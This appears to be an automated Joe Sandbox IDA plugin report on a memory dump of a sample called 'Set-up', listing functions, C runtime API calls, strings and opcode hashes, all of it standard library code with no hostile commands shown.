Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: InfoLocale$_calloc_crtfree$strncpy_s
String ID:
API String ID: 2432546303-0
Opcode ID: d73a824604444f0e50cf2fd3e6150e7193ba609834f23d19682ce6e19fb32f10
Instruction ID: 8d8cfa0ce0a977ebbcc559ff85802e010ce632a13a9b61a6fdf5007213c577a5
Opcode Fuzzy Hash: d73a824604444f0e50cf2fd3e6150e7193ba609834f23d19682ce6e19fb32f10
Instruction Fuzzy Hash: 6E51BE7290029AABEB109F668C45BAF3BB8EF05794F1044A5FD1892140FBB9CD64DF61

Function 6BB673B4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,20001004,00000005,00000002,?,?,6BB672F5,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB673D5
strcmp.MSVCR100(00000000,ACP,?,?,6BB672F5,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB72C1C
strcmp.MSVCR100(00000000,OCP,?,?,6BB672F5,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB9176C
GetLocaleInfoW.KERNEL32(?,2000000B,00000005,00000002,?,?,6BB672F5,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB91785

Strings

OCP, xrefs: 6BB91766
ACP, xrefs: 6BB72C16

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: InfoLocalestrcmp
String ID: ACP$OCP
API String ID: 3191669094-711371036
Opcode ID: fb58696909692a68e7f77115e9461d10838ea30d38830ccfee59f10ed6ddb875
Instruction ID: 2750b75f933e87a5bdb614aeb74a859c3281ec0dce693f1bf8a3b52bc6ac9164
Opcode Fuzzy Hash: fb58696909692a68e7f77115e9461d10838ea30d38830ccfee59f10ed6ddb875
Instruction Fuzzy Hash: 91012871A0569BBAEB119E75A845F9E33ACEF03398F2400B5EA01E1080FB6DCA419656

Function 6BB6A2A7 Relevance: 12.2, APIs: 8, Instructions: 225COMMONLIBRARYCODE

Download Yara Rule

APIs

wcsncpy_s.MSVCR100(?,000000FF,?,00000000,?,?,?,?,?,6BB6A24E,?,?,?,?,?,?), ref: 6BB6A3A2
wcsncpy_s.MSVCR100(?,000000FF,?,?,?,?,?,?,?,6BB6A24E,?,?,?,?,?,?), ref: 6BB91272
wcsncpy_s.MSVCR100(?,000000FF,00000000,?,?,?,?,?,?,6BB6A24E,?,?,?,?,?,?), ref: 6BB9129B
wcsncpy_s.MSVCR100(?,000000FF,?,?,?,?,?,?,?,6BB6A24E,?,?,?,?,?,?), ref: 6BB912B8
_errno.MSVCR100(?,?,?,?,?,6BB6A24E,?,?,?,?,?,?,?,?,?), ref: 6BB91321
_invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,6BB6A24E,?,?,?,?,?,?,?,?,?), ref: 6BB9132B
_errno.MSVCR100(?,?,?,?,?,6BB6A24E,?,?,?,?,?,?,?,?,?), ref: 6BB9133C

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: wcsncpy_s$_errno$_invalid_parameter_noinfo
String ID:
API String ID: 2268458229-0
Opcode ID: c1f5240053b108a06b6e3bafab692a3026b47fb90539e20584dc0318cf0e9ea9
Instruction ID: 34e65660e84495fc5d44678f5fdabddacc1c479ae660a6bb90728ac47568a86a
Opcode Fuzzy Hash: c1f5240053b108a06b6e3bafab692a3026b47fb90539e20584dc0318cf0e9ea9
Instruction Fuzzy Hash: 3B711B31D446F6EB9F18AF18984009D37BAEBA778476982BAEC1492180F3798C509F81

Function 6BB643A6 Relevance: 12.2, APIs: 8, Instructions: 223COMMON

Download Yara Rule

APIs

wcsncpy_s.MSVCR100(?,?,?,00000000), ref: 6BB644B2
wcsncpy_s.MSVCR100(?,?,00000000,?), ref: 6BB644D9
wcsncpy_s.MSVCR100(?,00000003,?,00000002), ref: 6BB6452E
wcsncpy_s.MSVCR100(?,?,?,?), ref: 6BB64562
_errno.MSVCR100 ref: 6BB913A1
_invalid_parameter_noinfo.MSVCR100 ref: 6BB913AB
_errno.MSVCR100 ref: 6BB913BC

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: wcsncpy_s$_errno$_invalid_parameter_noinfo
String ID:
API String ID: 2268458229-0
Opcode ID: 482527dddfd8eb0907e252b437bd19494a6dfea260ba71937d5eb1d190559979
Instruction ID: 6992d44e77ce13f5f3c55c702ac2e766a43ffa2d1464ca913579ad494335f865
Opcode Fuzzy Hash: 482527dddfd8eb0907e252b437bd19494a6dfea260ba71937d5eb1d190559979
Instruction Fuzzy Hash: BD711831D04296EBDF189F28C8620AE3BB6FBA578472581BAEC1492510F779CD91CB81

Function 6BB607A7 Relevance: 10.6, APIs: 7, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6BBDC14C
_crt_debugger_hook.MSVCR100(00000001), ref: 6BBDC159
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6BBDC161
UnhandledExceptionFilter.KERNEL32(6BBDC198), ref: 6BBDC16C
_crt_debugger_hook.MSVCR100(00000001), ref: 6BBDC17D
GetCurrentProcess.KERNEL32(C0000409), ref: 6BBDC188
TerminateProcess.KERNEL32(00000000), ref: 6BBDC18F

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
String ID:
API String ID: 3369434319-0
Opcode ID: 6be06fd46e0e742a05616144448bce0b8167cea5d597b826435398d6a205cfda
Instruction ID: a03b2083ee87ad6c90c2c3727550b9cc982ad0854252d962c2489cd5b1973231
Opcode Fuzzy Hash: 6be06fd46e0e742a05616144448bce0b8167cea5d597b826435398d6a205cfda
Instruction Fuzzy Hash: DA21DDB9805248AFDF48DF68D4496693BF4BB0A304F02415EE40A83350E7B6DA80AF25

Function 6BB6750C Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,00000080,?,?,00000000), ref: 6BB6753C
GetLocaleInfoW.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 6BB6758E
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,?,00000000,00000000,?,?,00000000), ref: 6BB675AC
_freea_s.MSVCR100(00000000,?,?,00000000), ref: 6BB675B5
malloc.MSVCR100(00000008,?,?,00000000), ref: 6BB91418

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: InfoLocale$ByteCharMultiWide_freea_smalloc
String ID:
API String ID: 221122905-0
Opcode ID: c2823f9cfd69d3619dceed7a42ac52ca845905bb666ab9e15247e45b5e37a1a4
Instruction ID: 48118505261b660dbc6815aa3d06d761f8ee27f2fbcd00a4d7b76f0c36d34357
Opcode Fuzzy Hash: c2823f9cfd69d3619dceed7a42ac52ca845905bb666ab9e15247e45b5e37a1a4
Instruction Fuzzy Hash: BF21F931601164BFCF019F66DC85D9F7BA9EF497A471040A5F92896250E779CD50CBA0

Function 6BB652E4 Relevance: 7.6, APIs: 5, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCR100(74DE8410,?,?,6BB6726E,?,0000000A,00000000), ref: 6BB878BE
_invalid_parameter_noinfo.MSVCR100(74DE8410,?,?,6BB6726E,?,0000000A,00000000), ref: 6BB878C8
_errno.MSVCR100(0000009C,74DE8410,?,?,6BB6726E,?,0000000A,00000000), ref: 6BB878D4
_invalid_parameter_noinfo.MSVCR100(0000009C,74DE8410,?,?,6BB6726E,?,0000000A,00000000), ref: 6BB878DE
_errno.MSVCR100(0000009C,74DE8410,?,?,6BB6726E,?,0000000A,00000000), ref: 6BB878EA

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: 55d666dd8a699c4ebf395b86ab4b46f2912cd88d49c6b26b25ca133e50ddebef
Instruction ID: 0e7aac3a35c5f3b123573e731936b9f2b0e14a86df913110e5b4de9845ca35ad
Opcode Fuzzy Hash: 55d666dd8a699c4ebf395b86ab4b46f2912cd88d49c6b26b25ca133e50ddebef
Instruction Fuzzy Hash: 1F2137316483C9DFD3064E3A98D079D7B51EB47B88F20417ED2864B242E7F88852CBA6

Function 6BB69D65 Relevance: 3.4, APIs: 2, Instructions: 398COMMON

Download Yara Rule

APIs

_errno.MSVCR100(00000000), ref: 6BB6997A
_invalid_parameter_noinfo.MSVCR100(00000000), ref: 6BB69985

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID:
API String ID: 2959964966-0
Opcode ID: c0b8f42afb0011b58e21b487e3770daf3f000053a2d362f4dfdfdfd78820ad51
Instruction ID: 762cc8f90601a40e3f12de4cc0b0a37747e2b4efede0b97bc11fb39d22703f34
Opcode Fuzzy Hash: c0b8f42afb0011b58e21b487e3770daf3f000053a2d362f4dfdfdfd78820ad51
Instruction Fuzzy Hash: B7F14671D04299CFDB24CFA9C4802EDBBB1FF49794F20816AE455AB285E7B89881CF41

Function 6BB6867F Relevance: 3.4, APIs: 2, Instructions: 391COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCR100(?,?), ref: 6BB68439
_invalid_parameter_noinfo.MSVCR100(?,?), ref: 6BB68444

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID:
API String ID: 2959964966-0
Opcode ID: d69f0cd6b6b82c5d60474aed5869f8a48f43f0dfd2d9939d9e96050470d987ce
Instruction ID: 9417cde36919da9003b14b40479f65d3a6b88dae56479806a3b91e7866c5e41f
Opcode Fuzzy Hash: d69f0cd6b6b82c5d60474aed5869f8a48f43f0dfd2d9939d9e96050470d987ce
Instruction Fuzzy Hash: 1EE14971D14299CFDB24DFA8C8402DDB7B1FF4A794F20816BD425AB284E7388986CF95

Function 6BB80919 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb9164c59b82a43f74e5b5438148b6fa86d19d374e7bbab9f73c52d3d62bd7b
Instruction ID: 64fbc723b54ed9e7d00a53a3afdc6b18af123427e1488d6b628ec1d060330835
Opcode Fuzzy Hash: 8bb9164c59b82a43f74e5b5438148b6fa86d19d374e7bbab9f73c52d3d62bd7b
Instruction Fuzzy Hash: 50320431D2AF914DEB239534C822336A35DEFB73D4F15D727E829B6996EB29C4834200

Function 6BB7911E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b54018450618b6d98d710f63ac2d4ca2ff4f35ec8798a48f981ad1f899916d6
Instruction ID: 06cac013a746d549803e2b43548ffb3aa98384487724037528cd46f6f8832cca
Opcode Fuzzy Hash: 3b54018450618b6d98d710f63ac2d4ca2ff4f35ec8798a48f981ad1f899916d6
Instruction Fuzzy Hash: 73B1EF30D2AF604DC76396398821336B65CAFBB2C6F52D72BFC6631D52EB22C5834640

Function 6BB697A0 Relevance: 1.8, Strings: 1, Instructions: 525COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 6BB9200B

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 9f909e78fd83290681f2be132dccdb60e93640ff86ffe020c2e955cc73491680
Instruction ID: c3f20e6d84fac90e6a6533cce8b5db7f70eaa9446961bc3e6fa555241cc3858b
Opcode Fuzzy Hash: 9f909e78fd83290681f2be132dccdb60e93640ff86ffe020c2e955cc73491680
Instruction Fuzzy Hash: 5312B172E106299BEF04CF68D8506ECB7B2FBCD364F298679D821B7280D3756A05CB50

Function 6BB68F83 Relevance: 1.8, Strings: 1, Instructions: 521COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 6BB923AD

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 3c9735c5119ce89384d0c19757369088e9820b9997f5bfd0cbbb0300de3609c2
Instruction ID: 7d9f442e7325ba488334261be567d6036220448dbfc1233d88d85004d1b4e1ef
Opcode Fuzzy Hash: 3c9735c5119ce89384d0c19757369088e9820b9997f5bfd0cbbb0300de3609c2
Instruction Fuzzy Hash: A912A172E106198FEF04DF68E8406ECB7B2FBCE324F258669D922B7284D7756905CB50

Function 6BB63A1C Relevance: 1.4, Strings: 1, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

Strings

N@, xrefs: 6BB63A2C

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID:
String ID: N@
API String ID: 0-1509896676
Opcode ID: 3e3bb3f6aa99e6c93c60c160689f60ed24c4f13bccc066950e67d947502959b0
Instruction ID: 0b6f7d327b97c59aa076423873295ea1cd95c76da496564499689b10da9ce126
Opcode Fuzzy Hash: 3e3bb3f6aa99e6c93c60c160689f60ed24c4f13bccc066950e67d947502959b0
Instruction Fuzzy Hash: ED718971E043458FDB18CF49C4946AEBBB2FF85300F1AC1AED9195B362D7B99984CB80

Function 6BB67093 Relevance: .5, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c1a407eed5521382d5566c5be072b29c2c2476b62912df008432b27dd7b8584
Instruction ID: 3644a6e2b5382fe18005c3e969cd0cb5a1e19126ec813bd564a3f4d3233db6f2
Opcode Fuzzy Hash: 0c1a407eed5521382d5566c5be072b29c2c2476b62912df008432b27dd7b8584
Instruction Fuzzy Hash: 7E027533D4D6F24B8B764EFA44D0216BBB0DE02B9031B86E5EDD03F196E15ADD1686D0

Function 6BB521F0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 019465f6f9e02e0fc0062f8e302c27189e91c114850a8fb19be0eb303bc783ff
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 2B115B7F2039CA43D6808D6DD4B07B7E395FBD632472843FAC0618B658C12BE0759902

Function 6BB733B8 Relevance: 54.6, APIs: 30, Strings: 1, Instructions: 367
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT(?), ref: 6BB7340B
_calloc_crt.MSVCR100(00000002,00000002), ref: 6BB73438
_wdupenv_s.MSVCR100(?,00000000,?), ref: 6BB73455
_wcslen.LIBCMT(?), ref: 6BB73469
_wcslen.LIBCMT(?), ref: 6BB7347D
wcscpy_s.MSVCR100(?,?,00000000,00000000,00000000,00000000,00000000), ref: 6BB734B4
_wcslen.LIBCMT(?,?,?,?,00000000,00000000,00000000,00000000), ref: 6BB734C6
wcscpy_s.MSVCR100(?,?,00000000,00000000,00000000,00000000,00000000), ref: 6BB734EA
_wcslen.LIBCMT(?,?,?,?,00000000,00000000,00000000,00000000), ref: 6BB734FC

Strings

SystemRoot, xrefs: 6BB733E5

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _wcslen$wcscpy_s$_calloc_crt_wdupenv_s
String ID: SystemRoot
API String ID: 2825862306-2034820756
Opcode ID: b882a74bf9180e1e0cc70d94a6f8b9de631b3b29803e8a89abdc0e13ed7ceec0
Instruction ID: 9a4d9e493450ecb7f9c73bd4f5c2a1141f163f347d46b292c712f582a813eb27
Opcode Fuzzy Hash: b882a74bf9180e1e0cc70d94a6f8b9de631b3b29803e8a89abdc0e13ed7ceec0
Instruction Fuzzy Hash: 98D19B72E04299DFDB25EFA8DC8199EB7F5FF08314B10406DE815AB250EB39AD41CB50

Function 6BB6DD9D Relevance: 49.3, APIs: 10, Strings: 18, Instructions: 277
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

operator+.LIBCMT ref: 6BB6DCE4
DName::DName.LIBCMT ref: 6BB6E26D
DName::operator+.LIBCMT ref: 6BB6E274
DName::DName.LIBCMT ref: 6BB6F2B2
DName::operator+.LIBCMT ref: 6BB6F2B9

Strings

<unknown>, xrefs: 6BB71D74
double, xrefs: 6BB6DDE4
wchar_t, xrefs: 6BB6E22E
__int64, xrefs: 6BB71D44
__w64 , xrefs: 6BB6DBF6
__int16, xrefs: 6BB6DC20
void, xrefs: 6BB71D86
__int128, xrefs: 6BB6DC34
UNKNOWN, xrefs: 6BB71D6A
volatile, xrefs: 6BB6DCCA
bool, xrefs: 6BB6F7AA
unsigned , xrefs: 6BB6E265
__int32, xrefs: 6BB6DC2A
__int8, xrefs: 6BB6DBDF
volatile, xrefs: 6BB6DCB8
const, xrefs: 6BB6DCA2
long , xrefs: 6BB71E22
signed , xrefs: 6BB71D60

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: NameName::Name::operator+$operator+
String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $bool$const$double$long $signed $unsigned $void$volatile$wchar_t
API String ID: 919369367-1531502760
Opcode ID: b8313f776a58fad98eef61a0decbe4ab9c5d386d5b6753a2464b1b36536b8ce5
Instruction ID: 8cbdee95224edd2019a09d154109f48a7652cb771e0b1cfd7236bfd7229fa0e0
Opcode Fuzzy Hash: b8313f776a58fad98eef61a0decbe4ab9c5d386d5b6753a2464b1b36536b8ce5
Instruction Fuzzy Hash: 8291DD75D841C9AACF14DFA8EC90AAD7774EF067D0F2041A6E921EA190F77D8E44CB21

Function 6BB7022F Relevance: 47.0, APIs: 31, Instructions: 498
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 6BB700E5
_isatty.MSVCR100(?,?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002), ref: 6BB702BE
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE), ref: 6BB702EF
__doserrno.MSVCR100(00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?), ref: 6BB8FD95
_errno.MSVCR100(00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?), ref: 6BB8FD9C
_invalid_parameter_noinfo.MSVCR100(00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?), ref: 6BB8FDA7
__doserrno.MSVCR100(?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0), ref: 6BB8FDC2
